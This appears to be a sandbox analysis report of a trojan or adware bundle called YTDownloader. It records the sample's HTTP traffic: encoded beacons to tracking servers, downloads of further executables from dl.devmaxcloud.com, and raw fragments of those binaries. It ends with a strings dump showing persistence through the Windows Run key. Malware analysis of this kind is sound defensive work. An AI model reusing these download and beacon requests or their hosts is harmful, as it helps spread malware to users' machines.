x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 250000-499999/7202264
.N...v....[4^....OS..-.&..0_..I...u./.Hh#"K..,....Y<.d......-.;8...
..!v..M.d..8.9.v...22...T....iO..t...h..y#$..j.F. ..n.wuN....I...|.Y7=
.. y........3".#..... ..5..s.wP`.....N...{%P....~|T.....=Y...\b$.j...?
..._9..[2.Y.C./Q..x.....Q...Wpt.r..&.-g..T.$l...U..E'a.N]H...O.?.....i
k......8}9U....y.l..N...B..t._..r...8.K..t...{r.I...&.6K.2cI...pH.....
Hy.."..Ds....h....A.7.J........R*.A...@.&.....~..d.......u.....Q.,...4
.A....d.."f...-..b.Yd..?)~.1.....r#.w"....'P&$R.,\~=D..R..k.lF..O.....
.D^..z..*...1T......H...hT.Q.m..m.9...N.p....o.LR...6Q.R...Y.......|..
.,.nE........Bg.`7.....W..a7...^...0Q..".u..hR..%..&q.i....P.......R.P
.n.\..5)..]..Xj.Z.*q.#c..x..1...OX.....5s......M..S2......*\{..n....Xq
.F.....&....^.{.>..h..#.v/..}...j..X.(M..w......R...a..~.. Vt....E&
gFT...:...~...e.yF2k6.....]...%..._& (4....[n^..K..j..B. '.<......N
.;......N.3A..4...$.C......d..V.4Bi...{....E....../.b....px...U.XN..KH
h|X..3....}:..........C..t ..vJ...D)u.0.....e.aZ`h&~f;\..$..\.Q.-...).
.%..k..{:......)..nL^....g.l...&c.]v....S.D.=."}.A....[i...$[=...p..A.
...OqI..H.A..g.2..]..^.......!...q#LX..-E]...K.....g....,.m..?.......k
.m.)>z.p!..DhHe...<...Z..(..\..<.#...=....ZO..C>~.H..5.Q*3
..Px.P.T..$S.5...@>.N _.S`.....m.}_.U.%./..rHhP..{P..W....a<:.M7
.r.D.d...4.....".R..S.].(."....N.../83....)..(.v;..../....A....Nu_4...
/...z.L.......d.B..}2d.)'hOP...I...Z.^[".b....h.S.....d.U..D...9...l[R
|....../.v.....C.0.>.*.`T:V-....?.i;x"...98.l.&&..I...g.o;..u..s?.2
a.".o@..{........x.5X....wt....a.Z..u.....i..1...d?...... s......I<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:17 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 500000-749999/7202264
..c>..C........A....K\.1..1*?s.g........,..x0.....<a._...0S.f..O
%>`..&....{..,cc.4!...=.....Z.....q'..?..8.....B.qzt.4..uuW....VC..
.>[email protected]..!..Q..1...!...
.,K...a..z...T.....;{WA..F.,s.... ....Q...S.G....g................B...
.t)..).T...G..*..-r...e....u......QJ....X......eI......RWE......*R....
r..}pFL.|[email protected]$. .....X.m
...o...T...=.....s.....ait..l-T.u.,..I...R..KE.y..#<.)x.....qb)....
....ZIB..7..xM.a....8.b.....m..t.,m..y]G...d........'~^..........D7r..
RSO...]..h....!.... a..3.#Y'*.j.......4`. _....3X.<...b..0!.......!
..jd...$... ........$v....N..e......p.......~Z.......3ZomG.$.....xE..O
.Q.........E...j. 2R...\...~.]....[...`.i....Z...,.Z..hI.'e.z.4...o.A.
=.8^./X=.&Op.R...YE.l.....2....X.......w....#.=...Q..0|........9x.....
.g%z......X4.<!.[......R9].v....`.....$. ....Z.....8\a*........B(.@
....&....I]...4......K.Bw..;.(..}]..N...?&.Y.x2..v.z<AR...`Y-.qm.._
.}.\.............C.0..g@..'.M...H...G.Ydj..=G.@.~.y....q..U.W..i.G...[
e.msXY....=.].../[email protected]*.O.wD...ZZ..0|..;T)1.1kE..r.z..O3..)f3..
....(.j...-o%.Z.u......w....>.-.@..|A.|K..h$....A........|"...L...;
......~DR..6X...._..b.uj.C.8c,......3-....Y.<O..c.].......7*.....&l
t;}...a.=sK.._~.XU.......c..R..'.q.*P_m .:KQ*&Xdj.J..6...y..].Y...$2..
.>2.....b......LJl.n;......`qX5..a.mp.?.;..| s d:..Y.....A....C....
....1..81...,...vd.K....C@|.24;WD....z.....V.......c..Z.. ..R....B...&
..9.4...Ba.AQ.B$i..7.....mRIe%.E:...%S......s.kB@'y^.?.`.Y.a.....v<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:18 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1000000-1249999/7202264
..7#....we.........k..M}..9..s.......m !n.]..?..,n..:...E.7......t..`C
..rxq&.....|.._...*.\...5.dlj..A.U0.&...O.....E..E."....d.'k.S.._..XM.
...8..k<.if.^WF......&Kb2].H....I....}86......l.Ui..*C.m..!.?]..a..
{{.{P........%...y?H.......q..x..........[{...w.X!..OF......hv....?..)
h...,...%`SM..j../.m.yE........... [....|..d..I5...8.....e.r,_..!m....
..._x...)k.}...d......;..?.T.......t..*.G....^....A..<..vm.|^......
R.q..............g.H.J,...<:7...]h.E..~...c7.2.SCm.rR...5u..E.~..*$
....._...A.C."..5..S..vU% ...H...qS..8..S..C..e....z.:.....M[..%.....R
X/.^hC....8.a.t....e.......o.F.......X..T6......k.iM..[.u6.....;J..3*n
.(..8.%..K....3..a..z..rq7...P......n..{D.0....P5.v?}f..{>...).....
....H.N...P.Y.FPd.... t..=5.6..7..v................ .4..&.xijI.!.ptX..
.i..R.q.p7j...a..0..iJW.....d..Z.K..dY..|......C.B...c.r.a$..r...J..^A
h..N..(.&{.)....:......>.....RD.@=.'....6......f.......}..s.5./....
$...d.....6D.3pT........r..........1j9..H74...1.bO....#...`gW5..YK.\..
.p.D.!.b.....(.....~6`.....I..!5..`..0...d.V...AYf2..ri...c.cUu...R...
.......V...C...............NA.....?...Fq..)yH.....#......Y.j.u..-...h.
r.....n..8f...b....% P...?.....$....jZ..J...|[email protected]./.M.-..btT...]
_.#,.>.t;.Y.H/.....o...@7./e.._.U.7...:._.........4... ."......... 
...d.w...R.r..DS...$N..U..z2T<..t.._.d...y..7#.nH....*....rl..3..g*
yU...]..q..R..>2-..m.2.V....n.",{..o..W..../.R...^_HF*...@a:W..'&..
..\o..q8.P....Bl\6.0.X. C.Q.Nd.%.h3.S..g7....d.#..'....eU......R....&l
t;...........3...!.^^T..pX'..O..[..[Q2/....0....v..."k...C<.#..<<< skipped >>>

GET /utility.gif?report=fdata&f=3&c=1729&i=10&n=ms_started&rnd=6928 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:54:55 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /app/ping.ashx?e=hNMAVKhukrxAU1hGZSx JO89WgGKzWAw62ls PLHCLDT03ZwnpMmrnnHkVEbFY2mhwr4VlWkO0yul9pd4H5jC0dQ5BPyXjjpaGsOh48yPAxgKkdlz1lRoRVZ6ImNImI0nDgs7q5vmXmt09Lyj4wnxzK4ON1tInGGgzaR8R5kiUwtv1FDNuuLGvDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWsFG5pEsdteceI9VTThLJ3UlF4mqrDXF/v6HzWHDR5YBjz 1atQERUN6CkfGpdw5qvq zYkkBMnThVOZjHwNmMDyjESsfx8vmmA9cYundBgRv3w3Jj7cm/ gp01/jAfMwbSGNlrViJV74d 8wlC3ACY1NLajJxa4x HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Length: 0

....

GET /app/ping.ashx?e=WVbe3wHlwMHKPGBAjb/btoHWA29bxdKW2YTeaOaZJPFysSIQM/WMqhsgZm851Wm705cEc0dFwLhTxWhzXOleYA8IGezBMfK jtneF477dPDU2Z1SyzBY81o8H6qezB8RqTFlxlzn4VKX1U8GGWeNj61SjtAHPTC3QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiYoYL3r 4idOA8Kj6Mu8v3vRYAGA yJTjkFE9hpSWZ9F0Ui/TCqSxnngK7X9N1SS09lwissX8oPDfQPHab7QXjtoXNw24za1vD4WpTRkXhg7nV3/LPfa2aq5oeRu5C4CqkWleu6Ut5wZJLhm4jKngLIPSVmnMg23wA= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Length: 0

HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Tue, 08 Sep 20
15 06:54:25 GMT..Content-Length: 0......

GET /app/ping.ashx?e=eISsn0A7mAY luBT5UotGBnacjZ2ZC2eBpXMF/9ZtDqRoZJTpqsyZxASc9FSZWyorVov04UjcEj6Cn6xgIPrOr0I8/BqvGRwjNnUrUd2W2BBPpL0iVh6pxZtcNn99AarsNnFPWAXezz 6096XL0Cvyx7HHvLPT/w6yTTTmaviHdEQuSWecGyDcgBCn zqDbhQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiYoYL3r 4idOA8Kj6Mu8v3vRYAGA yJTjkFE9hpSWZ9F0Ui/TCqSxnngK7X9N1SS09lwissX8oPDfQPHab7QXjtoXNw24za1vD4WpTRkXhg7nV3/LPfa2aq5oeRu5C4CqkWleu6Ut5wZJLhm4jKngLIPSVmnMg23wA= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 08 Sep 2015 06:54:26 GMT

Content-Length: 0

GET /utility.gif?report=fdata&f=3&c=803&i=10&n=ms_started&rnd=6928 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:54:55 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?error=mem_strt&report=mini_s&ver=1729&action=na&ms_vr=3&clock=5031&rnd=4904 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:54:59 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /spdbt/shoppy/snsch7.exe_a HTTP/1.1

Host: dl.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:55 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441692382"

Last-Modified: Tue, 08 Sep 2015 06:06:22 GMT

Cache-Control: max-age=920

Content-Length: 2058578

Content-Type: text/plain

X-HW: 1441695295.dop012.fr7.t,1441695295.cds007.fr7.c

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@...........................
......./........ ..............................p.......0...i..........
......................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]........... [email protected].
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..

<<< skipped >>>

GET /web/gf/all/setup.exe_c HTTP/1.1

Host: dl.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:55 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441676845"

Last-Modified: Tue, 08 Sep 2015 01:47:25 GMT

Cache-Control: max-age=3447

Content-Length: 2056891

Content-Type: text/plain

X-HW: 1441695295.dop006.fr7.t,1441695295.cds026.fr7.c
.!P\. ....Xt...y.t....p...%.&6.....66..4.f..B..^j.....(....J.$u6.r2.'.
..;.q.5.&2.].dD.....(.Wd....x._.|..."....*.,.=._ R.)..^*.E..C...U..`..
{K''y.:i.0..v.~.......:jI.v.8......0...j,o`..Z.I.w....F.Y;.rAG.[.|.A./
...=o.].s.8...`.RU...).e.h{..M..q......H...J_s.c)[email protected]..
x.Lm.N..p..Q.w....0V.v.....$.4.....q..x......^.b..(z..5..C~.. .j......
.....!.C..'[email protected]....*....$.AT:.J."..Lb..Z.P.r.N]j.......d.[nY.....p
...,.. .O.^TQ....H.....}.7.u........k.1.........n..))4....1.......A...
.O=R..^...W~............=.l....zC.....&T.>...D.T........`.m]2.D.x..
.....,{...a....#..u.k.D."....i.bk,/1z.# .2x.W.y.t.}0N..nG% ..R.A.Z..V.
..f..cb.Hkm..M......X|YR.....\S^.f....1z...u... %.......7|..]..h......
elx..G.G...o...i.3.....E...)..&?.......!... (...&....6........xf~.fur.
..~|..#ZC.b.(.w.$..s..........|..qu...U.5C..@D....!....D.z.<...Q9..
..&=...~../.Xj......C.!.."....x.a..m..........c(S.9M...G.m...#..{.....
..l.K.....5N..f...n.......?.....J..Z...j..g.(h......%.<..>a.c...
.._4..g3.......4.o.V".....L..;.?c...........p.Ov*..n,.$Y.KiV}.o.[.4|tO
..\..q{.N...\.c.H\.Nk6....c..9...b7..m.d...i...W=....9.Ig...x....k....
....={...#..6w.......`..j[.._..&s.0..Mg..h....."....8HD../....%HS.=dRj
...f..I.....wk...p.%....$.>...iK{%..8........ ..qB...Z.R.......O...
.-.>.A....l`...........b4.Y...|.....Oo.>!........{....;nr.jU|~..
4....E,.)tN..r..J.y..^FQ.P.XQK`i ./F......wE.$y.>.!..M...5..%ii1P..
.....=%J.;.#........2...m.X.FI..^....../.P....h....Z_)..3(....p. .W..m
.1.....6...m.Y.8.L.o._...>S<..Cu&~.N..^.3.K..pZ.V..'T...2..m<<< skipped >>>

GET /21214.ashx?e=KSz5qzb2KgIPgAd18hbyriP5Xzi0RWWWjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YFxk58JurVk52xuLvM2GxYQ5nnmIZ1dQR6XwF8xC533Fc8E2Pd9CMWovNtgMO1a3Sb80v5DDGc2FBbzjSNwj8cRJWOvghCBTr/XvKbjUyzCCcFAL52sIXt4V mdZi2lOgm uz5FUTyZHq7FlkgieM9uF8HvEUquLYK5RF10/JyN4cjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWm5xtDBkuzBZw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:59 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Tue, 08 Sep 2015 06:54:59 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /21214.ashx?e=jLYfrKkKGYPKPGBAjb/btsKRcGDMEsV9KB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOQUT2GlJZn0XRSL9MKpLGefSEibtKK7eEerVyaMS1AoBVcsZgjOTLBh8qNJTPfve0LwUfFNexyOby2yKeb vB GLGe0GBQxZ8R12Y34RZ2ijgb6v7cXpPvfJKubRTxkYPISyAE k24Wq8mha7dWcrUEK9eU5oqfvo2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VlldeU84v4l3E6y8Gq3XlpucbQwZLswWc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:59 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

GET /web/gf/all/setup.exe_e HTTP/1.1

Host: dl.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:55 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441676850"

Last-Modified: Tue, 08 Sep 2015 01:47:30 GMT

Cache-Control: max-age=3448

Content-Length: 2056888

Content-Type: text/plain

X-HW: 1441695295.dop010.fr7.t,1441695295.cds025.fr7.c
.....7.iGh*VA.D...m.Y_.....Q.l5..v.....'....sm,u.......(#.;........[.D
.......I.....2v...............&....!E.V%s.<............p......0u..G
G.....}r..s.cn?#...jG.l._{D<.....n..Q...<W.W..TU...[bv.S$j...c/.
Uav..*.........# .... T...f.(..5..k$...|.1..!.:.;,...w[...Y.&........&
lt;5...._.....J..YJ)...I;..... ^.s..`PZ....*{.9RO..@E~...2.....gj....]
 !<.-.h=...Sf./..Q.Zy....4.1(.....Z..#.......^.e.DwH....Y.KS....bly
..)........|.c......#@..K/d:....F..k j............xXDm..1...i.........
.P...D..{....(yh..v.1..E.........JU.~.bb\w..3.o..k./.<...Y..,p{U.P;
[email protected]^Lo......-c#...1.......Ub`.....&.\.
.........q.P.*t...S....H<..........Z....K.S. ..'.......)G....d..zc.
.. ..".p.!.......!.wEH.......M%.Uma3..bc..h!^=.)..........U..UNX. ....
...V..9.]...0..J..;.......5.....C...7.........~........9..b.E.].......
..........0g.7.."-....^./.e..X>..A..o.|->.fI'..........]2R&....N
i..G.6i..H..}.$......}5..W..... .{.^*..H.........}B......`&......Y.'..
.X..u.EZ.e.:..... .r..h(tc.....R,T.>*. .M..ovV6G..wj....1FU{.......
.%j....U...i..(0K4X.f..|D.J..).m)...2h..._m.Ze..q......eV...u..8.JAh..
[email protected].>.g.]......{.w9h..(.......V......S&....O....-&.Ycqt...
..i4.T..Af.L.....j...q.h..T3>s.u8.".h$.;.07:....{..c.}2...y.....xW.
;.$-o.NX.1...Ok.2e..V...............{m.6..p..u.....I.B...8/.}0w.e.l...
......u;.1.${t..;.K.FK.|.1.......B...TD.GY.RX....t......3....K.&R.63c.
BO....._..m.........[[J..i]F2.=r..NA..IA..8...k$M..F.;.e.....D<<
QhTl.m..M.t...*j...}...|.....)1.t.%.[./.&.N.#v.x6RX..n......H=..3.<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe_e HTTP/1.1

Host: dl.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:17:17 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441692392"

Last-Modified: Tue, 08 Sep 2015 06:06:32 GMT

Cache-Control: max-age=1342

Content-Length: 2058576

Content-Type: text/plain

X-HW: 1441695295.dop003.fr7.t,1441695295.cds034.fr7.s,1441695295.dop008.dc1.r,1441695295.cds023.dc1.c,1441695295.cds034.fr7.p
......l.....i....X.3......oo...*....2!y79..A.xu~.y..P\Xr.......y.0...H
.5..l)!..>...CT...}.LE.>0..:.....A...9...j...zQ9...n ..lK......"
.d.&........`....0.Kb.uT..*fv.v.B.x6..P.B.p........z.....n..9........&
lt;... .!.wCBip.B....Q.o.S.4a.*HZPw=/......EkO(............. ZP.\l....
 '.4......(.....".L.3..............st.0.....E.*.t...../R.M.X...U....k{
\%(r.k.0.../....<. F..Q..H....N1...M8qp/.9..y.i..t.>.%...f.W.!..
.\U.W.....3.....{.Hi.......z\b..k..&8Nx.u^.q....Xi..j.e.............uW
.........d2.e..I.V.T.......V..\.0....N....._......... 3c..]..c."ww..#.
.jQ..$.k....)}.....xQ...Z.}.dRQ1....c..u&.s....1A...r.P.ADu.V.P.....w.
d_..J0k...$....:>\n...S.!....C)^{..Fx.u...r"G.t.i....}...k...4.A.2.
.Ho.D.N..2.,.?*.`q.....G.p..IK.lS..3>_...z8...l{...B....L.....2....
......<.7.......'0M.'.\.>TO]J..0..'.=.y.$.j.C....a.J..L...e..%..
h4X..>V.Sb...'...'..h..2.V.e....S..$1.S..6....]..".io...._Y.z.hi..:
D7.{.X.n.Ux.....sr\..F.....s..djv.q..ß.g...q..o.?]..rl~Q.....)....CL
.!.l...Y...!.......&.......C...Q..../.n.*.{.R...d.Q... ..........@....
2..Z...[.#7V..b...5y...z..wPx3..L0S.j..j...t.......NB<C.kf......^.%
...w.H..t".....{^..tF..g.....3.....H]:.....!..%U).n..p.IL...s~EEIu:1..
.p...f..}j9.N.3 ....5.9.B)...'..o..G91.FU...I..o.!.=.....|.3.D(..>N
y.4.....E:Q...bY...:.B}.5.3...D...=...M...,....T.>.....T...|a.[.hR.
..p.. .....6..c1...;i....!L.Q....K.M]?U......Y.f..."...2.4.........$..
E....2.FKU.!B.jeH...W....]...J..7x........_..%..y.....[]Qa....S...].(.
..V. #rF.....ol..A#!./..`.4.....<...$TR<....F.<'..-W. ...<<< skipped >>>

GET /web/gf/all/setup.exe_a HTTP/1.1

Host: dl.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:55 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441676840"

Last-Modified: Tue, 08 Sep 2015 01:47:20 GMT

Cache-Control: max-age=3280

Content-Length: 2056891

Content-Type: text/plain

X-HW: 1441695295.dop007.fr7.t,1441695295.cds020.fr7.c

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@...........................
......./........ ..............................p.......p...i..........
......................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]........... [email protected].
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..

<<< skipped >>>

GET /utility.gif?error=start&report=mini_s&ver=803&action=na&ms_vr=3&clock=0&rnd=27847 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:54:54 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /t.ashx?e=QgW8pN5r26ZQhScA1jb3TygKFoNUu98snvZi s3jtzEHqUQ0J3/4E35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9yWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 4kxq0rpgo-zxis6jz8.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:16 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhsk....

GET /t.ashx?e=QgW8pN5r26ZQhScA1jb3TygKFoNUu98snvZi s3jtzEHqUQ0J3/4E35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9yWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 4kxq0rpgo-zxis6jz8.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:16 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhsk....

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 4kxq0rpgo-zxis6jz8.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:17 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhskHTTP/1.1 200 OK..Date: Tue, 08 Sep 2015 06:54:17 GMT..Con
tent-Type: text/html; charset=utf-8..Content-Length: 13..Connection: k
eep-alive..Cache-Control: private,no-cache, no-store..X-AspNet-Version
: 2.0.50727..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X-Cache:
 MISS..abfgshdgfjhsk..

The Trojan connects to the servers at the folowing location(s):

BROWSE~2.EXE_3752:

.text

`.rdata

@.data

.rsrc

@.reloc

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

Process token open Error: %u

C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelperSrv\2013_with_xp\BrowserHelperSrv.pdb

KERNEL32.dll

USER32.dll

ADVAPI32.dll

GetProcessHeap

GetCPInfo

zcÁ

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

4 5 52585>5

01S1|3

Amscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

kernel32.dll

USER32.DLL

BrowserHelper.exe

explorer.exe

Software\Microsoft\Windows\CurrentVersion\Run

e:%d s:%d

\BrowserHelper.exe

C:\PROGRA~1\YTDOWN~1\BROWSE~2.EXE

BrowserHelper.exe_3852:

.text

`.rdata

@.data

.rsrc

@.reloc

j.Yf;

_tcPVj@

.PjRW

Higher: %x

Lower: %x

broken pipe

